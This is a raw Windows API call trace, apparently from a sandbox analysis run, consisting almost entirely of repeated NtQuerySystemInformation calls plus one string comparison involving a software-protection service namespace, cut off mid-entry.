[0281.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0281.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0281.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0281.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0281.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0281.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x50, ResultLength=0x0) [0281.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0281.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0281.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc08, Length=0x50, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0281.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0281.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0281.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 